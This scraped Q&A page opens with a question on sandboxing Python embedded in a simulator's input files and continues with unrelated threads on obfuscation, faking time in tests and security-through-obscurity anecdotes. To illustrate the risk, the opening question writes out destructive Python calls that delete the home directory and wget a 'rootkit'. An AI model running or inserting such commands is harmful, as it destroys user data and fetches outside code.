we are working on a simulator. The simulator program has a slightly archaic input format which is painful to both users and developers. The simulator itself is written in C++, but we have now recently been able to retrofit embedded Python code in the input file - i.e. something like this[1,2]:
<python>
# Here comes normal Python code which can access and modify the current 'dom'.
...
</python>
Technically this works well - and it is extremely powerful. However the Python code in the <python>...</python> block is completely unrestricted; and hence can be a very effective vector of attack:
<python>
import os
os.system("rm -rf {}".format(os.getenv("HOME")))
os.system("wget evil_rootkit.sh")
...
</python>
As long as users run their own input files everything should be OK; but if simulations are run as a service under another user account the the potential for havoc is immense. I was thinking of a system where the administrator of the service created keys and distributed them to trusted users, and then the runtime of the simulator would check for a valid key before executing Python code. This is totally outside my normal expertise, and I would very much appreciate some pointers to things to think about, other solutions, ...
Sorry for the extremely open ended post - if you have a suggestion for a more suitable place to post this question I would be grateful.
[1]: I have not worked with php - but I think this should be quite similar in spirit, code embedded in a text input format - which is eval(...) under load.
[2]: Although I use the term 'dom' and refer to php - this is not html in any way!
Related
How can I package my Java application into an executable jar that cannot be decompiled (for example , by Jadclipse)?
You can't. If the JRE can run it, an application can de-compile it.
The best you can hope for is to make it very hard to read (replace all symbols with combinations of 'l' and '1' and 'O' and '0', put in lots of useless code and so on). You'd be surprised how unreadable you can make code, even with a relatively dumb translation tool.
This is called obfuscation and, while not perfect, it's sometimes adequate.
Remember, you can't stop the determined hacker any more than the determined burglar. What you're trying to do is make things very hard for the casual attacker. When presented with the symbols O001l1ll10O, O001llll10O, OO01l1ll10O, O0Ol11ll10O and O001l1ll1OO, and code that doesn't seem to do anything useful, most people will just give up.
First you can't avoid people reverse engineering your code. The JVM bytecode has to be plain to be executed and there are several programs to reverse engineer it (same applies to .NET CLR). You can only make it more and more difficult to raise the barrier (i.e. cost) to see and understand your code.
Usual way is to obfuscate the source with some tool. Classes, methods and fields are renamed throughout the codebase, even with invalid identifiers if you choose to, making the code next to impossible to comprehend. I had good results with JODE in the past. After obfuscating use a decompiler to see what your code looks like...
Next to obfuscation you can encrypt your class files (all but a small starter class) with some method and use a custom class loader to decrypt them. Unfortunately the class loader class can't be encrypted itself, so people might figure out the decryption algorithm by reading the decompiled code of your class loader. But the window to attack your code got smaller. Again this does not prevent people from seeing your code, just makes it harder for the casual attacker.
You could also try to convert the Java application to some windows EXE which would hide the clue that it's Java at all (to some degree) or really compile into machine code, depending on your need of JVM features. (I did not try this.)
GCJ is a free tool that can compile to either bytecode or native code. Keeping in mind, that does sort of defeat the purpose of Java.
A little late I know, but the answer is no.
Even if you write in C and compile to native code, there are dissasemblers / debuggers which will allow people to step through your code. Granted - debugging optimized code without symbolic information is a pain - but it can be done, I've had to do it on occasion.
There are steps that you can take to make this harder - e.g. on windows you can call the IsDebuggerPresent API in a loop to see if somebody is debugging your process, and if yes and it is a release build - terminate the process. Of course a sufficiently determined attacker could intercept your call to IsDebuggerPresent and always return false.
There are a whole variety of techniques that have cropped up - people who want to protect something and people who are out to crack it wide open, it is a veritable arms race! Once you go down this path - you will have to constantly keep updating/upgrading your defenses, there is no stopping.
This not my practical solution but , here i think good collection or resource and tutorials for making it happen to highest level of satisfaction.
A suggestion from this website (oracle community)
(clean way), Obfuscate your code, there are many open source and free
obfuscator tools, here is a simple list of them : [Open source
obfuscators list] .
These tools make your code unreadable( though still you can decompile
it) by changing names. this is the most common way to protect your
code.
2.(Not so clean way) If you have a specific target platform (like windows) or you can have different versions for different platforms,
you can write a sophisticated part of your algorithms in a low level
language like C (which is very hard to decompile and understand) and
use it as a native library in you java application. it is not clean,
because many of us use java for it's cross-platform abilities, and
this method fades that ability.
and this one below a step by step follow :
ProtectYourJavaCode
Enjoy!
Keep your solutions added we need this more.
I created expect script for customer and i fear to customize it like he want without returning to me so I tried to encrypt it but i didn't find a way for it
Then I tried to convert it to excutable but some commands was recognized by active tcl like "send" command even it is working perfectly on red hat
So is there a way to protect my script to be reading?
Thanks
It's usually enough to just package the code in a form that the user can't directly look inside. Even the smallest of speed-bump stops them.
You can use sdx qwrap to parcel your script up into a starkit. Those are reasonably resistant to random user poking, while being still technically open (the sdx tool is freely available, after all). You can convert the .kit file it creates into an executable by merging it with a packaged runtime.
In short, it's basically like this (with some complexity glossed over):
tclkit sdx.kit qwrap myapp.tcl
tclkit sdx.kit unwrap myapp.kit
# Copy additional assets into myapp.vfs if you need to
tclkit sdx.kit wrap myapp.exe -runtime C:\path\to\tclkit.exe
More discussion is here, the tclkit runtimes are here, and sdx itself can be obtained in .kit-packaged form here. Note that the runtime you use to run sdx does not need to be the same that you package; you can deploy code for other platforms than the one you are running from. This is a packaging phase action, not a compilation or linking.
Against more sophisticated users (i.e., not Joe Ordinary User) you'll want the Tcl Compiler out of the ActiveState TclDevKit. It's a code-obscurer formally (it doesn't actually improve the performance of anything) and the TDK isn't particularly well supported any more, but it's the main current solution for commercial protection of Tcl code. I'm on a small team working on a true compiler that will effectively offer much stronger protection, but that's not yet released (and really isn't ready yet).
One way is to store the essential code running in your server as back-end. Just give the user a fron-end application to do the requests. This way essential processes are on your control, and user cannot access that code.
I'm attempting to test an application which has a heavy dependency on the time of day. I would like to have the ability to execute the program as if it was running in normal time (not accelerated) but on arbitrary date/time periods.
My first thought was to abstract the time retrieval function calls with my own library calls which would allow me to alter the behaviour for testing but I wondered whether it would be possible without adding conditional logic to my code base or building a test variant of the binary.
What I'm really looking for is some kind of localised time domain, is this possible with a container (like Docker) or using LD_PRELOAD to intercept the calls?
I also saw a patch that enabled time to be disconnected from the system time using unshare(COL_TIME) but it doesn't look like this got in.
It seems like a problem that must have be solved numerous times before, anyone willing to share their solution(s)?
Thanks
AJ
Whilst alternative solutions and tricks are great, I think you're severely overcomplicating a simple problem. It's completely common and acceptable to include certain command-line switches in a program for testing/evaluation purposes. I would simply include a command line switch like this that accepts an ISO timestamp:
./myprogram --debug-override-time=2014-01-01Z12:34:56
Then at startup, if set, subtract it from the current system time, and indeed make a local apptime() function which corrects the output of regular system for this, and call that everywhere in your code instead.
The big advantage of this is that anyone can reproduce your testing results, without a big readup on custom linux tricks, so also an external testing team or a future co-developer who's good at coding but not at runtime tricks. When (unit) testing, that's a major advantage to be able to just call your code with a simple switch and be able to test the results for equality to a sample set.
You don't even have to document it, lots of production tools in enterprise-grade products have hidden command line switches for this kind of behaviour that the 'general public' need not know about.
There are several ways to query the time on Linux. Read time(7); I know at least time(2), gettimeofday(2), clock_gettime(2).
So you could use LD_PRELOAD tricks to redefine each of these to e.g. substract from the seconds part (not the micro-second or nano-second part) a fixed amount of seconds, given e.g. by some environment variable. See this example as a starting point.
I am working on a robotics research project, and would like to know: Does anyone have suggestions for best practices when organizing scientific data and code? Does anyone know of existing scientific libraries with source that I could examine?
Here are the elements of our 'suite':
Experiments - Two types:
Gathering data from existing, 'natural' system.
Data from running behaviors on robotic system.
Models
Description of dnamical system - dynamics, kinematics, etc
Parameters for said system, some of which are derived from type 1 experiments
Simulation - trying to simulate natural behaviors, simulating behaviors on robots
Implementation - code for controlling the robots. Granted this is a large undertaking and has a large infrastructure of its own.
Some design aspects of our 'suite':
Would be good if simulation environment allowed for 'rapid prototyping' (scripts / interactive prompt for simple hacks, quick data inspection, etc - definitely something hard to incorporate) - Currently satisfied through scripting language (Python, MATLAB)
Multiple programming languages
Distributed, collaborative setup - Will be using Git
Unit tests have not yet been incorporated, but will hopefully be later on
Cross Platform (unfortunately) - I am used to Linux, but my team members use Windows, and some of our tools are wed to that platform
I saw this post, and the books look interesting and I have ordered "Writing Scientific Software", but I feel like it will focus primarily on the implementation of the simulation code and less on the overall organization.
The situation you describe is very similar to what we have in our surface dynamics lab.
Some of the work involves keeping measurements data which are analysed at real time, or saved for late analysis.Some other work, on the other hand, involves running simulations and analysing their results.
The data management scheme, which the lab leader picked up at Cambridge while studying there, is centred around a main server which holds the personal files of all lab members. Each member access the files from his work station by mounting the appropriate server folder using NFS. This has its merits and faults. It is easier to back up everything, but is problematic when processing large amounts of data over the net. For this reason i am an exception in the lab, since the simulation i work with generates a large amount of data. This data is saved on my work station, and only the code used to generate it (source code of the simulation and configuration files) are saved on the server.
I also keep my code in an online SVN service, since i can not log into to lab server from home. This is a mandatory practice, which stems from the need to be able to reproduce older results on demands and trace changes to the code if some obscure bug appears. Hence the need to maintain older versions and configuration files.
We also employ low tech methods, such as lab notebooks to record results, modifications, etc.
This content can sometimes be more abstract (no point describing every changed line in the code - you have diff for this. Just the purpose of the change, perhaps some notes about implementations and its date).
Work is done mostly with Matlab. Again i am an exception, as i prefer Python. I also use C for the data generating simulation. Testing are mostly of convergences, since my project now is concerned with comparing to computational models. I just generate results with different configurations, saved in their own respected folder (which i track in my lab logbook). This has the benefits of being able to control and interface the data exactly as i want to, instead of conforming to someone else's ideas and formats.
As it currently stands, this question is not a good fit for our Q&A format. We expect answers to be supported by facts, references, or expertise, but this question will likely solicit debate, arguments, polling, or extended discussion. If you feel that this question can be improved and possibly reopened, visit the help center for guidance.
Closed 10 years ago.
Bonus points for explaining how you improved it.
Real life security by obscurity?
The key to the front door is stashed under a rock nearby, or under the welcome mat, or on top of a high railing.
These are all instances of security through obscurity, as in, it is right out in the open for anyone to grab, but most people wont be able to find it without huge amounts of searching. However, a dedicated attacker can walk right in.
Some people like to make their javascript difficult to read (and therefore hack) by using obfuscation. Google is among the users of this technique. At the simplest level, they change the variable and method names to a single inscrutable letter. The first variable is named "a", the second is named "b" and so on. It does succeed in making the javascript exceedingly difficult to read and follow. And it adds some protection to the intellectual property contained in the javascript code, which must be downloaded to the user's browser to be usable, therfore making it accessible to all.
In addition to making it difficult to read the code, this shortening of variable names reduces the size of the javascript code that has to be downloaded to the user's browser. Theoretically, this can reduce network traffic.
Here's an article about Google's obfuscation, and here's a list of available tools.
On a website I did some contract work on I noticed that they were storing double-hashed passwords. From memory, they were storing something like
$encrypted_password = md5( sha1( plaintext_password ) );
When I asked what the purpose of this was, I found out that the guy who wrote the account creation/login script had been reading about dictionary attacks. He figured that no one would ever think to create a dictionary where they hash inputs with md5 and sha1.
I improved the system by adding a random salt column to their user table. I left the double-hashing in though. It doesn't do anything to hurt the security of the system, and to be honest, I thought it was pretty clever for someone who didn't really know much about security to think of this.
Seen: Websites use a complex url to access ajax components rather than actually password protect them such as:
domain.com/3r809d8f09feefhjkdjfhjdf/delete.php?a=03809803983djfhkjsdfsadf
the string has remained constant, the query is random and is designed to stop attackers.
Improvement: Restrict the page to being accessed only from certain IP addresses. Add an authentication string to the query that is a salted hash of the access time.
In a more "real life" example, I don't know if it's intentional or not, but I like the way none of the doorbells in my block have any names on them, and that their numbers seem to have no correlation to the apartement numbers whatsoever. Ie. ring on #25 for apartement 605, #13 for apartement 404 and so on. :)
One vendor we deal with requires us to post the username and password in the querystring in ROT-13 "encrypted" format. No joke.
Security through obscurity is a valid tactic. Plenty of people have turned off replying with version information as a best practice for ftp and apache. Honeypots can be considered an obscured practice, since the attacker doesn't know the layout of the network and gets sucked into them. One high security site I know of assigns their username by a five digit alphanumeric phrase (such as '0a3bg') instead of using logical usernames. Anything that makes breaking into a system more difficult, or take longer, is a valid measure.
Security exclusively through obscurity is bad.
People writing their password on pieces of paper and putting it under their keyboard.
I solved it by logging into their computer with their account and sending out an embarrassing email to the group.
Seen: phpMyAdmin moved into the directory _phpmyadmin
Improvement: Disallowed access from outside the company's network.
Similar to #stech's solution.
Some of the admin pages in our application on the web, check for a local IP subnet range, else display access denied.
Improvement is accessed is restricted to users who are inside the network or VPNed to it.
Back in the old DBase/Clipper days I worked for a guy who developed an application for a friend of his. This friend wanted to have some "secretly" accessible program or data (I don't recall) that required a password only known to him.
The solution, I was told, was that Clipper opened a DOS prompt in the secret directory, with black text on black background colors (some ANSI control characters accomplished this).
The user had to type in the password, but this being input line of the DOS command prompt, the "password" was really the name of a batch file that was then executed.
I once saw a photography website where you could strip some characters off from the photo thumbnail pictures url to get the full version.
Many professional photographer websites use Javascript to prevent people from right-clicking on images to "save as ...". Most of those sites also don't do any watermarking.
I used to surf with referer headers disabled... it's quite surprising how many websites will blow up or flat-out reject you if they don't know where you came from.
One website had a poll and used cookies to prevent you from voting multiple times. You could simply erase that cookie and keep voting. And you could script it all using wget, too.
The example I see of this all the time is something being done in source code that the developer assumes no one will ever see. You see this a lot with crypto-keys in particular, embedded right in the source code. A lot of times it is not even a question of decompiling the code, they could outright just use the library.
The solution is always to teach the developer to assume that someone has the source code and can use it against you.
Going to great lengths to hide software names and version numbers .
Ie. changing Tomcat server name and version to some quotes and random numbers (like 666), changing the name and version numbers of regular javascript libraries like scriptaculous and prototype and so on.
In a current project we're using Google Web toolkit (GWT) and this sneaky little thing compiles Java to javascript (which you have little to no control over) and includes the string "GWT" and version number. Totally unacceptable of course so we'll need to make a script that will run after GWT compile to remove all these references(!).
/admin without password.
Yes I've seen it, it's very real.